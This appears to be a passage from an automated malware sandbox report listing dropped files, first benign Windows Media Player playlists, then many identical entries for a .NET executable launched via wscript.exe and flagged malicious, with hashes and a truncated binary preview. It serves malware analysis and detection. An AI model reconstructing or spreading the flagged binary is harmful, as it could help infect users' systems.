                          Preview:<?wpl version="1.0"?>..<smil>.. <head>.. <meta name="Generator" content="Microsoft Windows Media Player -- 9.0.0.3442"/>.. <title>Pictures rated 4 or 5 stars</title>.. </head>.. <body>.. <seq>.. <smartPlaylist version="1.0.0.0">.. <querySet>.. <sourceFilter id="{CC823400-A8E4-4081-B073-D3B6D952FE69}" name="Pictures in my library">.. <fragment name="User Rating">.. <argument name="condition">Is At Least</argument>.. <argument name="value">4 stars</argument>.. </fragment>.. </sourceFilter>.. </querySet>.. </smartPlaylist>.. </seq>.. </body>..</smil>..
                          Process:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                          File Type:HTML document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1040
                          Entropy (8bit):4.191452381408781
                          Encrypted:false
                          SSDEEP:12:x2G5/KDxwegG2b8C5EkqfxI+/RWNV7n5VvoZAvX1Hfjz+1qCjH1LNCjqCjWBX2W0:xtwxlftG/T5VaAvFmkcCGdKv
                          MD5:B9987B1F9DF6D0AFC01558B907E62A16
                          SHA1:EF202D5D6F90B37C71CB757F3BABB0857CE54D86
                          SHA-256:0892EFDB8459D81D4C5E1085239734D9910B9C6A1DEBD7189CF385141F0B19D1
                          SHA-512:6BC86075632C3E56FFE1D371F4178299E93E014F5C5C83DFDCA2DC9EFD1155633409C79EC87CFE2AFD4374B83771AE56A3EB7FAC00F83921B433CB49216037F9
                          Malicious:false
                          Reputation:unknown
                          Preview:<?wpl version="1.0"?>..<smil>.. <head>.. <meta name="Generator" content="Microsoft Windows Media Player -- 11.0.5428.4943"/>.. <title>TV recorded in the last week</title>.. </head>.. <body>.. <seq>.. <smartPlaylist version="1.0.0.0">.. <querySet>.. <sourceFilter id="{E5415A66-7763-4BDE-B97F-5557CA73C303}" name="TV shows in my library">.. <fragment name="Recording Date">.. <argument name="condition">Is Later Than</argument>.. <argument name="value">Last week</argument>.. </fragment>.. <fragment name="Sort by">.. <argument name="value">Recording Date</argument>.. <argument name="condition">Ascending</argument>.. </fragment>.. </sourceFilter>.. </querySet>.. </smartPlaylist>
                          Process:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                          File Type:HTML document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1020
                          Entropy (8bit):4.1337368900668165
                          Encrypted:false
                          SSDEEP:12:x2G5/KDxwegG2bxOBZ5EkqfxI+/RWNVz3pnDCAAvXMV/NXq2SqCjQNCjqCjWBX2D:xtwxlYxDG/LJXAvcVNv/CGdKv
                          MD5:A3787A42B81FCE0E448976AD158EDD93
                          SHA1:45FF275C0C32EAB1F0B56E8B61E8EAD18CFD1675
                          SHA-256:94BC17AC59BDE92FBCA00FCC69AED68FCBFE2C1754DD45F4810765F5FDF774FF
                          SHA-512:B36CA10F580EC9D455FB57149BCE1897FE48FDA6023B2FB55B6B4B80A91F1754311B91EDD72C13103E0DA9ED90B696C28D6904EA91984ADE69ED50791F4065AE
                          Malicious:false
                          Reputation:unknown
                          Preview:<?wpl version="1.0"?>..<smil>.. <head>.. <meta name="Generator" content="Microsoft Windows Media Player -- 11.0.5428.4943"/>.. <title>Video rated at 4 or 5 stars</title>.. </head>.. <body>.. <seq>.. <smartPlaylist version="1.0.0.0">.. <querySet>.. <sourceFilter id="{B2D9BDDC-8E49-444B-9BA4-193ABF9C7870}" name="Video in my library">.. <fragment name="User Rating">.. <argument name="condition">Is At Least</argument>.. <argument name="value">4 stars</argument>.. </fragment>.. <fragment name="Sort by">.. <argument name="value">Title</argument>.. <argument name="condition">Ascending</argument>.. </fragment>.. </sourceFilter>.. </querySet>.. </smartPlaylist>.. </seq>..
                          Process:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                          File Type:HTML document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1025
                          Entropy (8bit):4.153394340103766
                          Encrypted:false
                          SSDEEP:12:x2G5/KDxwe3f4MUWZ35EkqfxI+/RWNVYAh1MsAvXj/zbCjqCH/zxqCjWBX2WN8M+:xtwx/hUTG/rdAvTCGDdKv
                          MD5:467E71AA2FD951EB0A1AF3D6BB8378E8
                          SHA1:FB654C0B2663D4FA5FD0F1658097D936DD0429ED
                          SHA-256:A54BC2CAD63CED4FD9FF2A3A094A26E264E8A5CE8139193896D13236F494E2EE
                          SHA-512:F9242A4925B910F4A114652967A6E2F49444A3F0D9F35402FEF28CC8D39C58720930084112BAF92EB6716AF541FD76E3803CCC1E742CEC07F1D4FB6ABC13A42C
                          Malicious:false
                          Reputation:unknown
                          Preview:<?wpl version="1.0"?>..<smil>.. <head>.. <meta name="Generator" content="Microsoft Windows Media Player -- 9.0.0.3075"/>.. <title>Music played the most</title>.. </head>.. <body>.. <seq>.. <smartPlaylist version="1.0.0.0">.. <querySet>.. <sourceFilter id="{4202947A-A563-4B05-A754-A1B4B5989849}" name="Music in my library">.. <fragment name="Sort by">.. <argument name="value">Playcount: Total</argument>.. <argument name="condition">Descending</argument>.. </fragment>.. <fragment name="Playcount: Total">.. <argument name="condition">Is Greater Than</argument>.. <argument name="value">5</argument>.. </fragment>.. </sourceFilter>.. </querySet>.. </smartPlaylist>.. </seq
                          Process:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                          File Type:HTML document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1063
                          Entropy (8bit):4.198592374702475
                          Encrypted:false
                          SSDEEP:12:x2G5/KDxwegG2dL55EkqfxI+/RWNVYAh1MsAvXj7SNCjqCjhRNCjqCjWBX2WN8M+:xtwxloYG/rdAvXICGgCGdKv
                          MD5:51AEED11707741118E0706C1259DF22E
                          SHA1:6434E915B018C6D15898FE0A4D006BBE3E1EDB60
                          SHA-256:EC286113E5AD77AC34063589A137A6DC4B4CAB8845CD9C5386519983FA3B48F0
                          SHA-512:A674487F9CABE1FB2809CD98958DCE696F7F066D3738BFB30317201ED804DF3C72F2D24D6F9C0832CF446C8A965E21F3EA50AADA1C69860A12340D6ECA88E942
                          Malicious:false
                          Reputation:unknown
                          Preview:<?wpl version="1.0"?>..<smil>.. <head>.. <meta name="Generator" content="Microsoft Windows Media Player -- 11.0.5428.4943"/>.. <meta name="DontCopyToDevice" content="TRUE"/>.. <title>All Music</title>.. </head>.. <body>.. <seq>.. <smartPlaylist version="1.0.0.0">.. <querySet>.. <sourceFilter id="{4202947A-A563-4B05-A754-A1B4B5989849}" name="Music in my library">.. <fragment name="Sort by">.. <argument name="value">Album Artist</argument>.. <argument name="condition">Ascending</argument>.. </fragment>.. <fragment name="Sort by">.. <argument name="value">Album Title</argument>.. <argument name="condition">Ascending</argument>.. </fragment>.. </sourceFilter>.. </querySet>..
                          Process:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                          File Type:HTML document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):585
                          Entropy (8bit):4.586939224969076
                          Encrypted:false
                          SSDEEP:12:x2G5/KDxweAxdL535EkqfxI+/RWNVAiWMAAvXjWBX2WN8M+Vv:xtwxYf9qG/4xAv+Kv
                          MD5:74294EF495559ED32731F19096D70312
                          SHA1:FDC6CC849270016D2A382D7D0DAABF44A4556CD9
                          SHA-256:DB34D82F2CD23E6E55A64E12D2A0A9C27AC2DED156483238F22A336CA6825110
                          SHA-512:B068D903B83945F146ABD4CF384DA99AF608643C62B647EA65DB33C3B0E0FACE4727A74BE3210A9C6469BBC403D1F5C59D92CBD57722737E992B0E4F5E66662A
                          Malicious:false
                          Reputation:unknown
                          Preview:<?wpl version="1.0"?>..<smil>.. <head>.. <meta name="Generator" content="Microsoft Windows Media Player -- 10.0.0.3449"/>.. <meta name="DontCopyToDevice" content="TRUE"/>.. <title>All Pictures</title>.. </head>.. <body>.. <seq>.. <smartPlaylist version="1.0.0.0">.. <querySet>.. <sourceFilter id="{CC823400-A8E4-4081-B073-D3B6D952FE69}" name="Pictures in my library">.. </sourceFilter>.. </querySet>.. </smartPlaylist>.. </seq>.. </body>..</smil>..
                          Process:C:\Program Files (x86)\Windows Media Player\wmplayer.exe
                          File Type:HTML document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1079
                          Entropy (8bit):4.232889887576815
                          Encrypted:false
                          SSDEEP:12:x2G5/KDxwegG2dLx5EkqfxI+/RWNVz3pnDCAAvXnefVDKrqCjH1LbCjqCjWBX2W0:xtwxlowG/LJXAvXedKeMCGdKv
                          MD5:372D0BEEBEA5460409A6A1C53AC52A18
                          SHA1:1B5A925E00F9A4CC3A18FEB8F74A2E39EF11EEB6
                          SHA-256:5B8B62B35E5DD8A46CCCCAF3FC3743BE9E0965D24CBCD20DA2681065EEB37EF3
                          SHA-512:EFB412E3A17F4EAB84FB9F99B9E420D18E23610A9A66BCD7298C3BA68FD24ABE0C1F2E58FAA411E059788D34F4CEDE45F9E25C6578D13FAEFB8EE79ACD50F2E0
                          Malicious:false
                          Reputation:unknown
                          Preview:<?wpl version="1.0"?>..<smil>.. <head>.. <meta name="Generator" content="Microsoft Windows Media Player -- 11.0.5428.4943"/>.. <meta name="DontCopyToDevice" content="TRUE"/>.. <title>All Video</title>.. </head>.. <body>.. <seq>.. <smartPlaylist version="1.0.0.0">.. <querySet>.. <sourceFilter id="{B2D9BDDC-8E49-444B-9BA4-193ABF9C7870}" name="Video in my library">.. <fragment name="Secondary Media Type">.. <argument name="condition">Is Not</argument>.. <argument name="value">Video: TV show</argument>.. </fragment>.. <fragment name="Sort by">.. <argument name="value">Recording Date</argument>.. <argument name="condition">Descending</argument>.. </fragment>.. </sourceFilter>.. </
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Users\user\AppData\Local\Temp\aJEWGt.exe
                          File Type:ASCII text
                          Category:dropped
                          Size (bytes):4
                          Entropy (8bit):1.5
                          Encrypted:false
                          SSDEEP:3:Nv:9
                          MD5:D3B07384D113EDEC49EAA6238AD5FF00
                          SHA1:F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
                          SHA-256:B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
                          SHA-512:0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
                          Malicious:false
                          Reputation:unknown
                          Preview:foo.
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
